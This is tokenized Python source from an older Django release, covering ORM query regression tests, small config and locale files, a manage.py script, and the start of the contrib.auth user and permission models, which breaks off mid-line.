Ranking . objects . filter ( author__name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . assertNotEqual ( r . id , r . author . id ) <EOL> self . assertEqual ( r . rank , <NUM_LIT:4> ) <EOL> r . rank = <NUM_LIT:3> <EOL> r . save ( ) <EOL> self . assertQuerysetEqual ( <EOL> Ranking . objects . all ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket5261 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Note . objects . exclude ( Q ( ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> class SelectRelatedTests ( TestCase ) : <EOL> def test_tickets_3045_3288 ( self ) : <EOL> self . assertQuerysetEqual ( X . objects . all ( ) , [ ] ) <EOL> self . assertQuerysetEqual ( X . objects . select_related ( ) , [ ] ) <EOL> class SubclassFKTests ( TestCase ) : <EOL> def test_ticket7778 ( self ) : <EOL> num_celebs = Celebrity . objects . count ( ) <EOL> tvc = TvChef . objects . create ( name = "<STR_LIT>" ) <EOL> self . assertEqual ( Celebrity . objects . count ( ) , num_celebs + <NUM_LIT:1> ) <EOL> Fan . objects . 
create ( fan_of = tvc ) <EOL> Fan . objects . create ( fan_of = tvc ) <EOL> tvc . delete ( ) <EOL> self . assertEqual ( Celebrity . objects . count ( ) , num_celebs ) <EOL> class CustomPkTests ( TestCase ) : <EOL> def test_ticket7371 ( self ) : <EOL> self . assertQuerysetEqual ( Related . objects . order_by ( '<STR_LIT>' ) , [ ] ) <EOL> class NullableRelOrderingTests ( TestCase ) : <EOL> def test_ticket10028 ( self ) : <EOL> _ = Plaything . objects . create ( name = "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> Plaything . objects . all ( ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> class DisjunctiveFilterTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . n1 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:foo>' , id = <NUM_LIT:1> ) <EOL> ExtraInfo . objects . create ( info = '<STR_LIT>' , note = self . n1 ) <EOL> def test_ticket7872 ( self ) : <EOL> LeafA . objects . create ( data = '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( LeafA . objects . all ( ) , [ '<STR_LIT>' ] ) <EOL> self . assertQuerysetEqual ( <EOL> LeafA . objects . filter ( Q ( data = '<STR_LIT>' ) | Q ( join__b__data = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket8283 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> ( ExtraInfo . objects . filter ( note = self . n1 ) | ExtraInfo . objects . filter ( info = '<STR_LIT>' ) ) . filter ( note = self . n1 ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ( ExtraInfo . objects . filter ( info = '<STR_LIT>' ) | ExtraInfo . objects . filter ( note = self . n1 ) ) . filter ( note = self . n1 ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> class Queries6Tests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> generic = NamedCategory . objects . create ( name = "<STR_LIT>" ) <EOL> t1 = Tag . objects . create ( name = '<STR_LIT>' , category = generic ) <EOL> t2 = Tag . objects . create ( name = '<STR_LIT>' , parent = t1 , category = generic ) <EOL> t3 = Tag . objects . 
create ( name = '<STR_LIT>' , parent = t1 ) <EOL> t4 = Tag . objects . create ( name = '<STR_LIT>' , parent = t3 ) <EOL> t5 = Tag . objects . create ( name = '<STR_LIT>' , parent = t3 ) <EOL> n1 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:foo>' , id = <NUM_LIT:1> ) <EOL> ann1 = Annotation . objects . create ( name = '<STR_LIT>' , tag = t1 ) <EOL> ann1 . notes . add ( n1 ) <EOL> ann2 = Annotation . objects . create ( name = '<STR_LIT>' , tag = t4 ) <EOL> def test_parallel_iterators ( self ) : <EOL> qs = Tag . objects . all ( ) <EOL> i1 , i2 = iter ( qs ) , iter ( qs ) <EOL> self . assertEqual ( repr ( i1 . next ( ) ) , '<STR_LIT>' ) <EOL> self . assertEqual ( repr ( i1 . next ( ) ) , '<STR_LIT>' ) <EOL> self . assertEqual ( repr ( i2 . next ( ) ) , '<STR_LIT>' ) <EOL> self . assertEqual ( repr ( i2 . next ( ) ) , '<STR_LIT>' ) <EOL> self . assertEqual ( repr ( i2 . next ( ) ) , '<STR_LIT>' ) <EOL> self . assertEqual ( repr ( i1 . next ( ) ) , '<STR_LIT>' ) <EOL> qs = X . objects . all ( ) <EOL> self . assertEqual ( bool ( qs ) , False ) <EOL> self . assertEqual ( bool ( qs ) , False ) <EOL> def test_nested_queries_sql ( self ) : <EOL> qs = Annotation . objects . filter ( notes__in = Note . objects . filter ( note = "<STR_LIT>" ) ) <EOL> self . assertEqual ( <EOL> qs . query . get_compiler ( qs . db ) . as_sql ( ) [ <NUM_LIT:0> ] . count ( '<STR_LIT>' ) , <EOL> <NUM_LIT:2> <EOL> ) <EOL> def test_tickets_8921_9188 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> PointerA . objects . filter ( connection__pointerb__id = <NUM_LIT:1> ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> PointerA . objects . exclude ( connection__pointerb__id = <NUM_LIT:1> ) , <EOL> [ ] <EOL> ) <EOL> list ( Tag . objects . exclude ( children = None ) ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( children = None ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . 
exclude ( parent__annotation__name = "<STR_LIT>" ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Annotation . objects . exclude ( tag__children__name = "<STR_LIT>" ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Annotation . objects . filter ( notes__in = Note . objects . filter ( note = "<STR_LIT>" ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket3739 ( self ) : <EOL> q1 = Tag . objects . order_by ( '<STR_LIT:name>' ) <EOL> self . assertTrue ( q1 is not q1 . all ( ) ) <EOL> class GeneratorExpressionTests ( TestCase ) : <EOL> def test_ticket10432 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Note . objects . filter ( pk__in = ( x for x in ( ) ) ) , <EOL> [ ] <EOL> ) <EOL> class ComparisonTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . n1 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:foo>' , id = <NUM_LIT:1> ) <EOL> e1 = ExtraInfo . objects . create ( info = '<STR_LIT>' , note = self . n1 ) <EOL> self . a2 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e1 ) <EOL> def test_ticket8597 ( self ) : <EOL> _ = Item . objects . create ( name = "<STR_LIT>" , created = datetime . datetime . now ( ) , creator = self . a2 , note = self . n1 ) <EOL> _ = Item . objects . create ( name = "<STR_LIT>" , created = datetime . datetime . now ( ) , creator = self . a2 , note = self . n1 ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( name__iexact = "<STR_LIT>" ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( name__iexact = "<STR_LIT>" ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( name__istartswith = "<STR_LIT>" ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . 
filter ( name__iendswith = "<STR_LIT>" ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> class ExistsSql ( TestCase ) : <EOL> def setUp ( self ) : <EOL> settings . DEBUG = True <EOL> def test_exists ( self ) : <EOL> self . assertFalse ( Tag . objects . exists ( ) ) <EOL> self . assertTrue ( "<STR_LIT:id>" not in connection . queries [ - <NUM_LIT:1> ] [ '<STR_LIT>' ] and "<STR_LIT:name>" not in connection . queries [ - <NUM_LIT:1> ] [ '<STR_LIT>' ] ) <EOL> def tearDown ( self ) : <EOL> settings . DEBUG = False <EOL> class QuerysetOrderedTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_no_default_or_explicit_ordering ( self ) : <EOL> self . assertEqual ( Annotation . objects . all ( ) . ordered , False ) <EOL> def test_cleared_default_ordering ( self ) : <EOL> self . assertEqual ( Tag . objects . all ( ) . ordered , True ) <EOL> self . assertEqual ( Tag . objects . all ( ) . order_by ( ) . ordered , False ) <EOL> def test_explicit_ordering ( self ) : <EOL> self . assertEqual ( Annotation . objects . all ( ) . order_by ( '<STR_LIT:id>' ) . ordered , True ) <EOL> def test_order_by_extra ( self ) : <EOL> self . assertEqual ( Annotation . objects . all ( ) . extra ( order_by = [ '<STR_LIT:id>' ] ) . ordered , True ) <EOL> def test_annotated_ordering ( self ) : <EOL> qs = Annotation . objects . annotate ( num_notes = Count ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( qs . ordered , False ) <EOL> self . assertEqual ( qs . order_by ( '<STR_LIT>' ) . ordered , True ) <EOL> class SubqueryTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> DumbCategory . objects . create ( id = <NUM_LIT:1> ) <EOL> DumbCategory . objects . create ( id = <NUM_LIT:2> ) <EOL> DumbCategory . objects . create ( id = <NUM_LIT:3> ) <EOL> def test_ordered_subselect ( self ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> query = DumbCategory . objects . filter ( id__in = DumbCategory . objects . order_by ( '<STR_LIT>' ) [ <NUM_LIT:0> : <NUM_LIT:2> ] ) <EOL> self . assertEquals ( set ( query . 
values_list ( '<STR_LIT:id>' , flat = True ) ) , set ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) ) <EOL> query = DumbCategory . objects . filter ( id__in = DumbCategory . objects . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:2> ] ) <EOL> self . assertEquals ( set ( query . values_list ( '<STR_LIT:id>' , flat = True ) ) , set ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) ) <EOL> query = DumbCategory . objects . filter ( id__in = DumbCategory . objects . order_by ( '<STR_LIT>' ) [ <NUM_LIT:2> : ] ) <EOL> self . assertEquals ( set ( query . values_list ( '<STR_LIT:id>' , flat = True ) ) , set ( [ <NUM_LIT:1> ] ) ) <EOL> except DatabaseError : <EOL> self . assertFalse ( connections [ DEFAULT_DB_ALIAS ] . features . allow_sliced_subqueries ) <EOL> def test_sliced_delete ( self ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> DumbCategory . objects . filter ( id__in = DumbCategory . objects . order_by ( '<STR_LIT>' ) [ <NUM_LIT:0> : <NUM_LIT:1> ] ) . delete ( ) <EOL> self . assertEquals ( set ( DumbCategory . objects . values_list ( '<STR_LIT:id>' , flat = True ) ) , set ( [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) <EOL> except DatabaseError : <EOL> self . assertFalse ( connections [ DEFAULT_DB_ALIAS ] . features . allow_sliced_subqueries ) <EOL> class CloneTests ( TestCase ) : <EOL> def test_evaluated_queryset_as_argument ( self ) : <EOL> "<STR_LIT>" <EOL> n = Note ( note = '<STR_LIT>' , misc = '<STR_LIT>' ) <EOL> n . save ( ) <EOL> e = ExtraInfo ( info = '<STR_LIT>' , note = n ) <EOL> e . save ( ) <EOL> n_list = Note . objects . all ( ) <EOL> list ( n_list ) <EOL> try : <EOL> self . assertEquals ( ExtraInfo . objects . filter ( note__in = n_list ) [ <NUM_LIT:0> ] . info , '<STR_LIT>' ) <EOL> except : <EOL> self . fail ( '<STR_LIT>' ) <EOL> class EmptyQuerySetTests ( TestCase ) : <EOL> def test_emptyqueryset_values ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . none ( ) . values ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) , [ ] <EOL> ) <EOL> def test_values_subquery ( self ) : <EOL> self . 
assertQuerysetEqual ( <EOL> Number . objects . filter ( pk__in = Number . objects . none ( ) . values ( "<STR_LIT>" ) ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( pk__in = Number . objects . none ( ) . values_list ( "<STR_LIT>" ) ) , <EOL> [ ] <EOL> ) <EOL> class ValuesQuerysetTests ( BaseQuerysetTest ) : <EOL> def test_flat_values_lits ( self ) : <EOL> Number . objects . create ( num = <NUM_LIT> ) <EOL> qs = Number . objects . values_list ( "<STR_LIT>" ) <EOL> qs = qs . values_list ( "<STR_LIT>" , flat = True ) <EOL> self . assertValueQuerysetEqual ( <EOL> qs , [ <NUM_LIT> ] <EOL> ) <EOL> class WeirdQuerysetSlicingTests ( BaseQuerysetTest ) : <EOL> def setUp ( self ) : <EOL> Number . objects . create ( num = <NUM_LIT:1> ) <EOL> Number . objects . create ( num = <NUM_LIT:2> ) <EOL> Article . objects . create ( name = '<STR_LIT>' , created = datetime . datetime . now ( ) ) <EOL> Article . objects . create ( name = '<STR_LIT>' , created = datetime . datetime . now ( ) ) <EOL> Article . objects . create ( name = '<STR_LIT>' , created = datetime . datetime . now ( ) ) <EOL> Article . objects . create ( name = '<STR_LIT>' , created = datetime . datetime . now ( ) ) <EOL> def test_tickets_7698_10202 ( self ) : <EOL> self . assertQuerysetEqual ( Article . objects . all ( ) [ <NUM_LIT:0> : <NUM_LIT:0> ] , [ ] ) <EOL> self . assertQuerysetEqual ( Article . objects . all ( ) [ <NUM_LIT:0> : <NUM_LIT:0> ] [ : <NUM_LIT:10> ] , [ ] ) <EOL> self . assertEqual ( Article . objects . all ( ) [ : <NUM_LIT:0> ] . count ( ) , <NUM_LIT:0> ) <EOL> self . assertRaisesMessage ( <EOL> AssertionError , <EOL> '<STR_LIT>' , <EOL> Article . objects . all ( ) [ : <NUM_LIT:0> ] . latest , '<STR_LIT>' <EOL> ) <EOL> class EscapingTests ( TestCase ) : <EOL> def test_ticket_7302 ( self ) : <EOL> _ = ReservedName . objects . create ( name = '<STR_LIT:a>' , order = <NUM_LIT> ) <EOL> ReservedName . objects . 
create ( name = '<STR_LIT:b>' , order = <NUM_LIT> ) <EOL> self . assertQuerysetEqual ( <EOL> ReservedName . objects . all ( ) . order_by ( '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ReservedName . objects . extra ( select = { '<STR_LIT>' : '<STR_LIT:name>' } , order_by = ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> class ToFieldTests ( TestCase ) : <EOL> def test_in_query ( self ) : <EOL> apple = Food . objects . create ( name = "<STR_LIT>" ) <EOL> pear = Food . objects . create ( name = "<STR_LIT>" ) <EOL> lunch = Eaten . objects . create ( food = apple , meal = "<STR_LIT>" ) <EOL> dinner = Eaten . objects . create ( food = pear , meal = "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> set ( Eaten . objects . filter ( food__in = [ apple , pear ] ) ) , <EOL> set ( [ lunch , dinner ] ) , <EOL> ) <EOL> def test_reverse_in ( self ) : <EOL> apple = Food . objects . create ( name = "<STR_LIT>" ) <EOL> pear = Food . objects . create ( name = "<STR_LIT>" ) <EOL> lunch_apple = Eaten . objects . create ( food = apple , meal = "<STR_LIT>" ) <EOL> lunch_pear = Eaten . objects . create ( food = pear , meal = "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> set ( Food . objects . filter ( eaten__in = [ lunch_apple , lunch_pear ] ) ) , <EOL> set ( [ apple , pear ] ) <EOL> ) <EOL> def test_single_object ( self ) : <EOL> apple = Food . objects . create ( name = "<STR_LIT>" ) <EOL> lunch = Eaten . objects . create ( food = apple , meal = "<STR_LIT>" ) <EOL> dinner = Eaten . objects . create ( food = apple , meal = "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> set ( Eaten . objects . filter ( food = apple ) ) , <EOL> set ( [ lunch , dinner ] ) <EOL> ) <EOL> def test_single_object_reverse ( self ) : <EOL> apple = Food . objects . create ( name = "<STR_LIT>" ) <EOL> lunch = Eaten . objects . create ( food = apple , meal = "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> set ( Food . objects . 
filter ( eaten = lunch ) ) , <EOL> set ( [ apple ] ) <EOL> ) <EOL> def test_recursive_fk ( self ) : <EOL> node1 = Node . objects . create ( num = <NUM_LIT> ) <EOL> node2 = Node . objects . create ( num = <NUM_LIT:1> , parent = node1 ) <EOL> self . assertEqual ( <EOL> list ( Node . objects . filter ( parent = node1 ) ) , <EOL> [ node2 ] <EOL> ) <EOL> def test_recursive_fk_reverse ( self ) : <EOL> node1 = Node . objects . create ( num = <NUM_LIT> ) <EOL> node2 = Node . objects . create ( num = <NUM_LIT:1> , parent = node1 ) <EOL> self . assertEqual ( <EOL> list ( Node . objects . filter ( node = node2 ) ) , <EOL> [ node1 ] <EOL> ) <EOL> if sys . version_info [ : <NUM_LIT:2> ] != ( <NUM_LIT:2> , <NUM_LIT:6> ) : <EOL> class OrderingLoopTests ( BaseQuerysetTest ) : <EOL> def setUp ( self ) : <EOL> generic = NamedCategory . objects . create ( name = "<STR_LIT>" ) <EOL> t1 = Tag . objects . create ( name = '<STR_LIT>' , category = generic ) <EOL> t2 = Tag . objects . create ( name = '<STR_LIT>' , parent = t1 , category = generic ) <EOL> t3 = Tag . objects . create ( name = '<STR_LIT>' , parent = t1 ) <EOL> t4 = Tag . objects . create ( name = '<STR_LIT>' , parent = t3 ) <EOL> t5 = Tag . objects . create ( name = '<STR_LIT>' , parent = t3 ) <EOL> def test_infinite_loop ( self ) : <EOL> self . assertRaisesMessage ( <EOL> FieldError , <EOL> '<STR_LIT>' , <EOL> lambda : list ( LoopX . objects . all ( ) ) <EOL> ) <EOL> self . assertRaisesMessage ( <EOL> FieldError , <EOL> '<STR_LIT>' , <EOL> lambda : list ( LoopZ . objects . all ( ) ) <EOL> ) <EOL> self . assertEqual ( len ( Tag . objects . order_by ( '<STR_LIT>' ) ) , <NUM_LIT:5> ) <EOL> self . assertQuerysetEqual ( <EOL> LoopX . objects . all ( ) . order_by ( '<STR_LIT>' ) , <EOL> [ ] <EOL> ) <EOL> if settings . DATABASES [ DEFAULT_DB_ALIAS ] [ '<STR_LIT>' ] == "<STR_LIT>" : <EOL> class GroupingTests ( TestCase ) : <EOL> def test_null_ordering_added ( self ) : <EOL> query = Tag . objects . 
values_list ( '<STR_LIT>' , flat = True ) . order_by ( ) . query <EOL> query . group_by = [ '<STR_LIT>' ] <EOL> sql = query . get_compiler ( DEFAULT_DB_ALIAS ) . as_sql ( ) [ <NUM_LIT:0> ] <EOL> fragment = "<STR_LIT>" <EOL> pos = sql . find ( fragment ) <EOL> self . assertEqual ( sql . find ( fragment , pos + <NUM_LIT:1> ) , - <NUM_LIT:1> ) <EOL> self . assertEqual ( sql . find ( "<STR_LIT>" , pos + len ( fragment ) ) , pos + len ( fragment ) ) <EOL> if settings . DATABASES [ DEFAULT_DB_ALIAS ] [ '<STR_LIT>' ] != "<STR_LIT>" : <EOL> class InLookupTests ( TestCase ) : <EOL> def test_ticket14244 ( self ) : <EOL> Number . objects . all ( ) . delete ( ) <EOL> numbers = range ( <NUM_LIT> ) <EOL> for num in numbers : <EOL> _ = Number . objects . create ( num = num ) <EOL> self . assertEqual ( <EOL> Number . objects . filter ( num__in = numbers [ : <NUM_LIT:1000> ] ) . count ( ) , <EOL> <NUM_LIT:1000> <EOL> ) <EOL> self . assertEqual ( <EOL> Number . objects . filter ( num__in = numbers [ : <NUM_LIT> ] ) . count ( ) , <EOL> <NUM_LIT> <EOL> ) <EOL> self . assertEqual ( <EOL> Number . objects . filter ( num__in = numbers [ : <NUM_LIT> ] ) . count ( ) , <EOL> <NUM_LIT> <EOL> ) <EOL> self . assertEqual ( <EOL> Number . objects . filter ( num__in = numbers ) . count ( ) , <EOL> <NUM_LIT> <EOL> ) </s>
<s> from django . conf . urls . defaults import * <EOL> from views import empty_view <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , empty_view , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , empty_view , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , empty_view , name = "<STR_LIT>" ) , <EOL> ) </s>
<s> import unittest <EOL> from django . utils . tzinfo import FixedOffset <EOL> class TzinfoTests ( unittest . TestCase ) : <EOL> def test_fixedoffset ( self ) : <EOL> self . assertEquals ( repr ( FixedOffset ( <NUM_LIT:0> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( - <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( - <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( - <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( - <NUM_LIT> * <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( <NUM_LIT> * <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( - <NUM_LIT> * <NUM_LIT> ) ) , '<STR_LIT>' ) <EOL> self . assertEquals ( repr ( FixedOffset ( <NUM_LIT> * <NUM_LIT> ) ) , '<STR_LIT>' ) </s>
<s> DATE_FORMAT = '<STR_LIT>' <EOL> TIME_FORMAT = '<STR_LIT>' <EOL> DATETIME_FORMAT = '<STR_LIT>' <EOL> YEAR_MONTH_FORMAT = '<STR_LIT>' <EOL> MONTH_DAY_FORMAT = '<STR_LIT>' <EOL> SHORT_DATE_FORMAT = '<STR_LIT>' <EOL> DECIMAL_SEPARATOR = '<STR_LIT:U+002C>' <EOL> THOUSAND_SEPARATOR = '<STR_LIT:.>' </s>
<s> from django . core . management import execute_manager <EOL> import imp <EOL> try : <EOL> imp . find_module ( '<STR_LIT>' ) <EOL> except ImportError : <EOL> import sys <EOL> sys . stderr . write ( "<STR_LIT>" % __file__ ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> import settings <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> execute_manager ( settings ) </s>
<s> import datetime <EOL> import urllib <EOL> from django . contrib import auth <EOL> from django . contrib . auth . signals import user_logged_in <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . db import models <EOL> from django . db . models . manager import EmptyManager <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . utils . encoding import smart_str <EOL> from django . utils . hashcompat import md5_constructor , sha_constructor <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils . crypto import constant_time_compare <EOL> UNUSABLE_PASSWORD = '<STR_LIT:!>' <EOL> def get_hexdigest ( algorithm , salt , raw_password ) : <EOL> """<STR_LIT>""" <EOL> raw_password , salt = smart_str ( raw_password ) , smart_str ( salt ) <EOL> if algorithm == '<STR_LIT>' : <EOL> try : <EOL> import crypt <EOL> except ImportError : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return crypt . crypt ( raw_password , salt ) <EOL> if algorithm == '<STR_LIT>' : <EOL> return md5_constructor ( salt + raw_password ) . hexdigest ( ) <EOL> elif algorithm == '<STR_LIT>' : <EOL> return sha_constructor ( salt + raw_password ) . hexdigest ( ) <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def check_password ( raw_password , enc_password ) : <EOL> """<STR_LIT>""" <EOL> algo , salt , hsh = enc_password . split ( '<STR_LIT:$>' ) <EOL> return constant_time_compare ( hsh , get_hexdigest ( algo , salt , raw_password ) ) <EOL> def update_last_login ( sender , user , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> user . last_login = datetime . datetime . now ( ) <EOL> user . save ( ) <EOL> user_logged_in . connect ( update_last_login ) <EOL> class SiteProfileNotAvailable ( Exception ) : <EOL> pass <EOL> class PermissionManager ( models . Manager ) : <EOL> def get_by_natural_key ( self , codename , app_label , model ) : <EOL> return self . 
get ( <EOL> codename = codename , <EOL> content_type = ContentType . objects . get_by_natural_key ( app_label , model ) <EOL> ) <EOL> class Permission ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> name = models . CharField ( _ ( '<STR_LIT:name>' ) , max_length = <NUM_LIT:50> ) <EOL> content_type = models . ForeignKey ( ContentType ) <EOL> codename = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT:100> ) <EOL> objects = PermissionManager ( ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> unique_together = ( ( '<STR_LIT>' , '<STR_LIT>' ) , ) <EOL> ordering = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT>" % ( <EOL> unicode ( self . content_type . app_label ) , <EOL> unicode ( self . content_type ) , <EOL> unicode ( self . name ) ) <EOL> def natural_key ( self ) : <EOL> return ( self . codename , ) + self . content_type . natural_key ( ) <EOL> natural_key . dependencies = [ '<STR_LIT>' ] <EOL> class Group ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> name = models . CharField ( _ ( '<STR_LIT:name>' ) , max_length = <NUM_LIT> , unique = True ) <EOL> permissions = models . ManyToManyField ( Permission , verbose_name = _ ( '<STR_LIT>' ) , blank = True ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> class UserManager ( models . Manager ) : <EOL> def create_user ( self , username , email , password = None ) : <EOL> """<STR_LIT>""" <EOL> now = datetime . datetime . now ( ) <EOL> try : <EOL> email_name , domain_part = email . strip ( ) . split ( '<STR_LIT:@>' , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> email = '<STR_LIT:@>' . join ( [ email_name , domain_part . lower ( ) ] ) <EOL> user = self . 
model ( username = username , email = email , is_staff = False , <EOL> is_active = True , is_superuser = False , last_login = now , <EOL> date_joined = now ) <EOL> user . set_password ( password ) <EOL> user . save ( using = self . _db ) <EOL> return user <EOL> def create_superuser ( self , username , email , password ) : <EOL> u = self . create_user ( username , email , password ) <EOL> u . is_staff = True <EOL> u . is_active = True <EOL> u . is_superuser = True <EOL> u . save ( using = self . _db ) <EOL> return u <EOL> def make_random_password ( self , length = <NUM_LIT:10> , allowed_chars = '<STR_LIT>' ) : <EOL> "<STR_LIT>" <EOL> from random import choice <EOL> return '<STR_LIT>' . join ( [ choice ( allowed_chars ) for i in range ( length ) ] ) <EOL> def _user_get_all_permissions ( user , obj ) : <EOL> permissions = set ( ) <EOL> anon = user . is_anonymous ( ) <EOL> for backend in auth . get_backends ( ) : <EOL> if not anon or backend . supports_anonymous_user : <EOL> if hasattr ( backend , "<STR_LIT>" ) : <EOL> if obj is not None : <EOL> if backend . supports_object_permissions : <EOL> permissions . update ( <EOL> backend . get_all_permissions ( user , obj ) <EOL> ) <EOL> else : <EOL> permissions . update ( backend . get_all_permissions ( user ) ) <EOL> return permissions <EOL> def _user_has_perm ( user , perm , obj ) : <EOL> anon = user . is_anonymous ( ) <EOL> active = user . is_active <EOL> for backend in auth . get_backends ( ) : <EOL> if ( not active and not anon and backend . supports_inactive_user ) or ( not anon or backend . supports_anonymous_user ) : <EOL> if hasattr ( backend , "<STR_LIT>" ) : <EOL> if obj is not None : <EOL> if ( backend . supports_object_permissions and <EOL> backend . has_perm ( user , perm , obj ) ) : <EOL> return True <EOL> else : <EOL> if backend . has_perm ( user , perm ) : <EOL> return True <EOL> return False <EOL> def _user_has_module_perms ( user , app_label ) : <EOL> anon = user . is_anonymous ( ) <EOL> active = user . 
is_active <EOL> for backend in auth . get_backends ( ) : <EOL> if ( not active and not anon and backend . supports_inactive_user ) or ( not anon or backend . supports_anonymous_user ) : <EOL> if hasattr ( backend , "<STR_LIT>" ) : <EOL> if backend . has_module_perms ( user , app_label ) : <EOL> return True <EOL> return False <EOL> class User ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> username = models . CharField ( _ ( '<STR_LIT:username>' ) , max_length = <NUM_LIT:30> , unique = True , help_text = _ ( "<STR_LIT>" ) ) <EOL> first_name = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT:30> , blank = True ) <EOL> last_name = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT:30> , blank = True ) <EOL> email = models . EmailField ( _ ( '<STR_LIT>' ) , blank = True ) <EOL> password = models . CharField ( _ ( '<STR_LIT:password>' ) , max_length = <NUM_LIT> , help_text = _ ( "<STR_LIT>" ) ) <EOL> is_staff = models . BooleanField ( _ ( '<STR_LIT>' ) , default = False , help_text = _ ( "<STR_LIT>" ) ) <EOL> is_active = models . BooleanField ( _ ( '<STR_LIT>' ) , default = True , help_text = _ ( "<STR_LIT>" ) ) <EOL> is_superuser = models . BooleanField ( _ ( '<STR_LIT>' ) , default = False , help_text = _ ( "<STR_LIT>" ) ) <EOL> last_login = models . DateTimeField ( _ ( '<STR_LIT>' ) , default = 